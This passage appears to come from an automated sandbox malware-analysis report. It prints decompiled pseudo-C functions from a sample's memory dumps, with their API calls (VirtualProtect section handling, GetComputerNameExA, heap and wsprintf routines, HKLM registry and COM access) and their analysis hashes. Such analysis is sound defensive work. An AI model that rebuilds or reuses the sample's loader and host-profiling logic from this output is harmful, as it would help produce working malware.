                                                                                                                                                                                              						_t31 = 0xbf;
                                                                                                                                                                                              						E00DF6106();
                                                                                                                                                                                              						RtlFreeHeap( *0xdfd238, 0, _t41); // executed
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t25 = E00DF514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					_t31 = _t25;
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t26 = RtlAllocateHeap(); // executed
                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t25 = E00DF1754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                                                                                                                                                                              				goto L5;
                                                                                                                                                                                              			}













                                                                                                                                                                                              0x00df9f11
                                                                                                                                                                                              0x00df9f11
                                                                                                                                                                                              0x00df9f14
                                                                                                                                                                                              0x00df9f15
                                                                                                                                                                                              0x00df9f1f
                                                                                                                                                                                              0x00df9f26
                                                                                                                                                                                              0x00df9f2b
                                                                                                                                                                                              0x00df9f2d
                                                                                                                                                                                              0x00df9f33
                                                                                                                                                                                              0x00df9f33
                                                                                                                                                                                              0x00df9f39
                                                                                                                                                                                              0x00df9f61
                                                                                                                                                                                              0x00df9f79
                                                                                                                                                                                              0x00df9f7b
                                                                                                                                                                                              0x00df9f7c
                                                                                                                                                                                              0x00df9f7e
                                                                                                                                                                                              0x00df9fbc
                                                                                                                                                                                              0x00df9fbc
                                                                                                                                                                                              0x00df9fc2
                                                                                                                                                                                              0x00df9fc8
                                                                                                                                                                                              0x00df9fc8
                                                                                                                                                                                              0x00df9f80
                                                                                                                                                                                              0x00df9f86
                                                                                                                                                                                              0x00df9f89
                                                                                                                                                                                              0x00df9f98
                                                                                                                                                                                              0x00df9f9a
                                                                                                                                                                                              0x00df9fa1
                                                                                                                                                                                              0x00df9fd5
                                                                                                                                                                                              0x00df9fda
                                                                                                                                                                                              0x00df9fdc
                                                                                                                                                                                              0x00df9fde
                                                                                                                                                                                              0x00df9fde
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9fdc
                                                                                                                                                                                              0x00df9fa3
                                                                                                                                                                                              0x00df9fa8
                                                                                                                                                                                              0x00df9fb6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9fb6
                                                                                                                                                                                              0x00df9f70
                                                                                                                                                                                              0x00df9f75
                                                                                                                                                                                              0x00df9f75
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9f75
                                                                                                                                                                                              0x00df9f3b
                                                                                                                                                                                              0x00df9f43
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9f52
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00DF9F3B
                                                                                                                                                                                                • Part of subcall function 00DF1754: GetTickCount.KERNEL32 ref: 00DF1768
                                                                                                                                                                                                • Part of subcall function 00DF1754: wsprintfA.USER32 ref: 00DF17B8
                                                                                                                                                                                                • Part of subcall function 00DF1754: wsprintfA.USER32 ref: 00DF17D5
                                                                                                                                                                                                • Part of subcall function 00DF1754: wsprintfA.USER32 ref: 00DF1801
                                                                                                                                                                                                • Part of subcall function 00DF1754: HeapFree.KERNEL32(00000000,?), ref: 00DF1813
                                                                                                                                                                                                • Part of subcall function 00DF1754: wsprintfA.USER32 ref: 00DF1834
                                                                                                                                                                                                • Part of subcall function 00DF1754: HeapFree.KERNEL32(00000000,?), ref: 00DF1844
                                                                                                                                                                                                • Part of subcall function 00DF1754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DF1872
                                                                                                                                                                                                • Part of subcall function 00DF1754: GetTickCount.KERNEL32 ref: 00DF1883
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00DF9F59
                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,?,?,00DF9C62,00000002,?,?,?,?), ref: 00DF9FB6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1676223858-0
                                                                                                                                                                                              • Opcode ID: c46aef36d4d1d59761b093e13b408f23d68a5c4c943a4dedbea54755ed9d667a
                                                                                                                                                                                              • Instruction ID: ae6b49552a885860381c700be0cd722789d4c593862ba159fbf3b1170d3eb7a2
                                                                                                                                                                                              • Opcode Fuzzy Hash: c46aef36d4d1d59761b093e13b408f23d68a5c4c943a4dedbea54755ed9d667a
                                                                                                                                                                                              • Instruction Fuzzy Hash: FF216675600209EBCB009F69DC40BBA77ADEF49300F12C026FA06DB251DB30EA46DBB1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                              			E00A81EB4(void* __eax, void* _a4) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				long _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				signed int _t31;
                                                                                                                                                                                              				long _t33;
                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                              				signed int _t42;
                                                                                                                                                                                              				void* _t50;
                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              				_t42 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                              				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                              				_v20 = _t42;
                                                                                                                                                                                              				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				if(_t42 <= 0) {
                                                                                                                                                                                              					L11:
                                                                                                                                                                                              					return _v12;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t51 = _t50 + 0x24;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t54 = _v12;
                                                                                                                                                                                              					if(_t54 != 0) {
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					asm("bt dword [esi], 0x1d");
                                                                                                                                                                                              					if(_t54 >= 0) {
                                                                                                                                                                                              						asm("bt dword [esi], 0x1e");
                                                                                                                                                                                              						if(__eflags >= 0) {
                                                                                                                                                                                              							_t33 = 4;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							asm("bt dword [esi], 0x1f");
                                                                                                                                                                                              							_t35 = 0;
                                                                                                                                                                                              							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						asm("bt dword [esi], 0x1f");
                                                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                                                              						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                              						_v12 = GetLastError();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t51 = _t51 + 0x28;
                                                                                                                                                                                              					_v8 = _v8 + 1;
                                                                                                                                                                                              					_t31 = _v8;
                                                                                                                                                                                              					if(_t31 < _v20) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                              			}















                                                                                                                                                                                              0x00a81ebe
                                                                                                                                                                                              0x00a81ec3
                                                                                                                                                                                              0x00a81ecf
                                                                                                                                                                                              0x00a81edc
                                                                                                                                                                                              0x00a81ee2
                                                                                                                                                                                              0x00a81ee4
                                                                                                                                                                                              0x00a81eea
                                                                                                                                                                                              0x00a81f57
                                                                                                                                                                                              0x00a81f5e
                                                                                                                                                                                              0x00a81f5e
                                                                                                                                                                                              0x00a81eec
                                                                                                                                                                                              0x00a81eef
                                                                                                                                                                                              0x00a81eef
                                                                                                                                                                                              0x00a81ef3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81ef5
                                                                                                                                                                                              0x00a81ef9
                                                                                                                                                                                              0x00a81f11
                                                                                                                                                                                              0x00a81f15
                                                                                                                                                                                              0x00a81f29
                                                                                                                                                                                              0x00a81f17
                                                                                                                                                                                              0x00a81f17
                                                                                                                                                                                              0x00a81f1d
                                                                                                                                                                                              0x00a81f21
                                                                                                                                                                                              0x00a81f21
                                                                                                                                                                                              0x00a81efb
                                                                                                                                                                                              0x00a81efb
                                                                                                                                                                                              0x00a81f07
                                                                                                                                                                                              0x00a81f0c
                                                                                                                                                                                              0x00a81f0c
                                                                                                                                                                                              0x00a81f3a
                                                                                                                                                                                              0x00a81f3e
                                                                                                                                                                                              0x00a81f46
                                                                                                                                                                                              0x00a81f46
                                                                                                                                                                                              0x00a81f49
                                                                                                                                                                                              0x00a81f4c
                                                                                                                                                                                              0x00a81f4f
                                                                                                                                                                                              0x00a81f55
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81f55
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00A81EE2
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00A81F3A
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A81F40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1469625949-0
                                                                                                                                                                                              • Opcode ID: 355f738bcb1c9afd342da524864d03a5325f3930c77e26b992188a4e7a594e3b
                                                                                                                                                                                              • Instruction ID: f5f45fe8c73c794661183cc16ae8cb5f5018798c264c692fd7292bb28a62a588
                                                                                                                                                                                              • Opcode Fuzzy Hash: 355f738bcb1c9afd342da524864d03a5325f3930c77e26b992188a4e7a594e3b
                                                                                                                                                                                              • Instruction Fuzzy Hash: AE2190B2940209EFEB20DF95CC80EBDB7B8FF14355F20455AE641A7152D3749A8ADB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00A816E4() {
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				void _v32;
                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                              				int _t26;
                                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                              				intOrPtr* _t37;
                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t15 =  *0xa84144;
                                                                                                                                                                                              				if( *0xa8412c > 5) {
                                                                                                                                                                                              					_t16 = _t15 + 0xa850f4;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t16 = _t15 + 0xa850b1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00A81000(_t16, _t16);
                                                                                                                                                                                              				_t35 = 6;
                                                                                                                                                                                              				memset( &_v32, 0, _t35 << 2);
                                                                                                                                                                                              				if(E00A81D86( &_v32,  &_v16,  *0xa84140 ^ 0xc786104c) == 0) {
                                                                                                                                                                                              					_t25 = 0xb;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t26 = lstrlenW( *0xa84138);
                                                                                                                                                                                              					_t8 = _t26 + 2; // 0x2
                                                                                                                                                                                              					_t44 = _t26 + _t8;
                                                                                                                                                                                              					_t11 = _t44 + 8; // 0xa
                                                                                                                                                                                              					_t30 = E00A810FC(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                                                                              					if(_t30 == 0) {
                                                                                                                                                                                              						_t37 = _v36;
                                                                                                                                                                                              						 *_t37 = _t30;
                                                                                                                                                                                              						_t32 =  *0xa84138;
                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                              							 *(_t37 + 4) = 0;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							memcpy(_t37 + 4, _t32, _t44);
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t25 = E00A81ADC(_v28); // executed
                                                                                                                                                                                              				}
                                                                                                                                                                                              				ExitThread(_t25);
                                                                                                                                                                                              			}

















                                                                                                                                                                                              0x00a816ea
                                                                                                                                                                                              0x00a816fb
                                                                                                                                                                                              0x00a81705
                                                                                                                                                                                              0x00a816fd
                                                                                                                                                                                              0x00a816fd
                                                                                                                                                                                              0x00a816fd
                                                                                                                                                                                              0x00a8170c
                                                                                                                                                                                              0x00a81715
                                                                                                                                                                                              0x00a8171a
                                                                                                                                                                                              0x00a81738
                                                                                                                                                                                              0x00a81793
                                                                                                                                                                                              0x00a8173a
                                                                                                                                                                                              0x00a81740
                                                                                                                                                                                              0x00a81746
                                                                                                                                                                                              0x00a81746
                                                                                                                                                                                              0x00a81754
                                                                                                                                                                                              0x00a81758
                                                                                                                                                                                              0x00a8175f
                                                                                                                                                                                              0x00a81761
                                                                                                                                                                                              0x00a81765
                                                                                                                                                                                              0x00a81767
                                                                                                                                                                                              0x00a8176e
                                                                                                                                                                                              0x00a81782
                                                                                                                                                                                              0x00a81770
                                                                                                                                                                                              0x00a81776
                                                                                                                                                                                              0x00a8177b
                                                                                                                                                                                              0x00a8176e
                                                                                                                                                                                              0x00a8178a
                                                                                                                                                                                              0x00a8178a
                                                                                                                                                                                              0x00a81795

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?), ref: 00A81740
                                                                                                                                                                                              • memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 00A81776
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00A81795
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitThreadlstrlenmemcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3726537860-0
                                                                                                                                                                                              • Opcode ID: c2cb6ef713a514026079eb50c8c3e8ae540f7e7fbbdc476a4d17c9d6f2227615
                                                                                                                                                                                              • Instruction ID: caa8071d6562429ca663d464df95effdbe39404542558323a918afd80212d17c
                                                                                                                                                                                              • Opcode Fuzzy Hash: c2cb6ef713a514026079eb50c8c3e8ae540f7e7fbbdc476a4d17c9d6f2227615
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C11DD72904302AFDB20EBB0DD88E9777FCEB08340F100929F545D71A1FB24E58A8B92
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                              			E00DF642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				intOrPtr* _t35;
                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                              				intOrPtr* _t41;
                                                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                              				intOrPtr* _t50;
                                                                                                                                                                                              				intOrPtr* _t52;
                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                              				intOrPtr* _t55;
                                                                                                                                                                                              				intOrPtr* _t57;
                                                                                                                                                                                              				intOrPtr* _t61;
                                                                                                                                                                                              				intOrPtr* _t65;
                                                                                                                                                                                              				intOrPtr _t68;
                                                                                                                                                                                              				void* _t72;
                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t55 = _a4;
                                                                                                                                                                                              				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                              				_a4 = 0;
                                                                                                                                                                                              				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                              				if(_t76 < 0) {
                                                                                                                                                                                              					L18:
                                                                                                                                                                                              					return _t76;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t40 = E00DF4FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                              				_t76 = _t40;
                                                                                                                                                                                              				if(_t76 >= 0) {
                                                                                                                                                                                              					_t61 = _a28;
                                                                                                                                                                                              					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                              						_t52 = _v8;
                                                                                                                                                                                              						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t76 >= 0) {
                                                                                                                                                                                              						_t43 =  *_t55;
                                                                                                                                                                                              						_t68 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              						_t20 = _t68 + 0xdfe1fc; // 0x740053
                                                                                                                                                                                              						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                              						if(_t76 >= 0) {
                                                                                                                                                                                              							_t76 = E00DF5103(_a4);
                                                                                                                                                                                              							if(_t76 >= 0) {
                                                                                                                                                                                              								_t65 = _a28;
                                                                                                                                                                                              								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                                                                              									_t50 = _a4;
                                                                                                                                                                                              									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t45 = _a4;
                                                                                                                                                                                              						if(_t45 != 0) {
                                                                                                                                                                                              							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t57 = __imp__#6;
                                                                                                                                                                                              						if(_a20 != 0) {
                                                                                                                                                                                              							 *_t57(_a20);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                              							 *_t57(_a12);
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t41 = _v8;
                                                                                                                                                                                              				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                                                                              				goto L18;
                                                                                                                                                                                              			}





















                                                                                                                                                                                              0x00df6432
                                                                                                                                                                                              0x00df6435
                                                                                                                                                                                              0x00df6445
                                                                                                                                                                                              0x00df644e
                                                                                                                                                                                              0x00df6452
                                                                                                                                                                                              0x00df6520
                                                                                                                                                                                              0x00df6526
                                                                                                                                                                                              0x00df6526
                                                                                                                                                                                              0x00df646c
                                                                                                                                                                                              0x00df6471
                                                                                                                                                                                              0x00df6475
                                                                                                                                                                                              0x00df647b
                                                                                                                                                                                              0x00df6480
                                                                                                                                                                                              0x00df6487
                                                                                                                                                                                              0x00df6496
                                                                                                                                                                                              0x00df6496
                                                                                                                                                                                              0x00df649a
                                                                                                                                                                                              0x00df649c
                                                                                                                                                                                              0x00df64a8
                                                                                                                                                                                              0x00df64b3
                                                                                                                                                                                              0x00df64be
                                                                                                                                                                                              0x00df64c2
                                                                                                                                                                                              0x00df64cc
                                                                                                                                                                                              0x00df64d0
                                                                                                                                                                                              0x00df64d2
                                                                                                                                                                                              0x00df64d7
                                                                                                                                                                                              0x00df64de
                                                                                                                                                                                              0x00df64ee
                                                                                                                                                                                              0x00df64ee
                                                                                                                                                                                              0x00df64d7
                                                                                                                                                                                              0x00df64d0
                                                                                                                                                                                              0x00df64f0
                                                                                                                                                                                              0x00df64f5
                                                                                                                                                                                              0x00df64fa
                                                                                                                                                                                              0x00df64fa
                                                                                                                                                                                              0x00df64fd
                                                                                                                                                                                              0x00df6506
                                                                                                                                                                                              0x00df650b
                                                                                                                                                                                              0x00df650b
                                                                                                                                                                                              0x00df6510
                                                                                                                                                                                              0x00df6515
                                                                                                                                                                                              0x00df6515
                                                                                                                                                                                              0x00df6510
                                                                                                                                                                                              0x00df649a
                                                                                                                                                                                              0x00df6517
                                                                                                                                                                                              0x00df651d
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00DF4FFA: SysAllocString.OLEAUT32(80000002), ref: 00DF5057
                                                                                                                                                                                                • Part of subcall function 00DF4FFA: SysFreeString.OLEAUT32(00000000), ref: 00DF50BD
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00DF650B
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00DFA6F4), ref: 00DF6515
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$Free$Alloc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 986138563-0
                                                                                                                                                                                              • Opcode ID: 738f964f2c512907894166056e9e0d148591c036f0ec0ed22578a950383e41a1
                                                                                                                                                                                              • Instruction ID: 5920706a0e980b009e4ab8be12fa472ff25d16e9048da9f02c153aaad97b5125
                                                                                                                                                                                              • Opcode Fuzzy Hash: 738f964f2c512907894166056e9e0d148591c036f0ec0ed22578a950383e41a1
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA314B71500159AFCB11EF68C888CAFBB79FFC97447158658F9059B215E231ED51CBB0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                                                              			E00DF73E9(void* __ecx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				intOrPtr* _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t23 = __imp__;
                                                                                                                                                                                              				_t20 = 0;
                                                                                                                                                                                              				_v8 = _v8 & 0;
                                                                                                                                                                                              				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                              				_t10 = _v8;
                                                                                                                                                                                              				if(_v8 != 0) {
                                                                                                                                                                                              					_t20 = E00DF58BE(_t10 + 1);
                                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                                              						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                              						if(_t15 != 0) {
                                                                                                                                                                                              							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							E00DF147E(_t20);
                                                                                                                                                                                              							_t20 = 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t20;
                                                                                                                                                                                              			}









                                                                                                                                                                                              0x00df73ee
                                                                                                                                                                                              0x00df73f9
                                                                                                                                                                                              0x00df73fb
                                                                                                                                                                                              0x00df7401
                                                                                                                                                                                              0x00df7403
                                                                                                                                                                                              0x00df7408
                                                                                                                                                                                              0x00df7411
                                                                                                                                                                                              0x00df7415
                                                                                                                                                                                              0x00df741e
                                                                                                                                                                                              0x00df7422
                                                                                                                                                                                              0x00df7431
                                                                                                                                                                                              0x00df7424
                                                                                                                                                                                              0x00df7425
                                                                                                                                                                                              0x00df742a
                                                                                                                                                                                              0x00df742a
                                                                                                                                                                                              0x00df7422
                                                                                                                                                                                              0x00df7415
                                                                                                                                                                                              0x00df743a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetComputerNameExA.KERNEL32(00000003,00000000,00DF51DC,74B5F710,00000000,?,?,00DF51DC), ref: 00DF7401
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • GetComputerNameExA.KERNEL32(00000003,00000000,00DF51DC,00DF51DD,?,?,00DF51DC), ref: 00DF741E
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 187446995-0
                                                                                                                                                                                              • Opcode ID: 7a260c47346033d9f0adc12c0686a44adead8bae668550f5fd2800fd7b8e6d2d
                                                                                                                                                                                              • Instruction ID: e93613db1ecf23abf05ada21166a724b04776f5d510ab80bd4643acbac9364ea
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a260c47346033d9f0adc12c0686a44adead8bae668550f5fd2800fd7b8e6d2d
                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F0B42660410DBAEB10DAB98D00EFF7ABCDBC4740F264059BA14D3200EA74DF0196B0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 34%
                                                                                                                                                                                              			E00DF7BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				void* _v18;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				asm("stosw");
                                                                                                                                                                                              				_t15 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t4 = _t15 + 0xdfe39c; // 0x4c08944
                                                                                                                                                                                              				_t20 = _t4;
                                                                                                                                                                                              				_t6 = _t15 + 0xdfe124; // 0x650047
                                                                                                                                                                                              				_t17 = E00DF642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
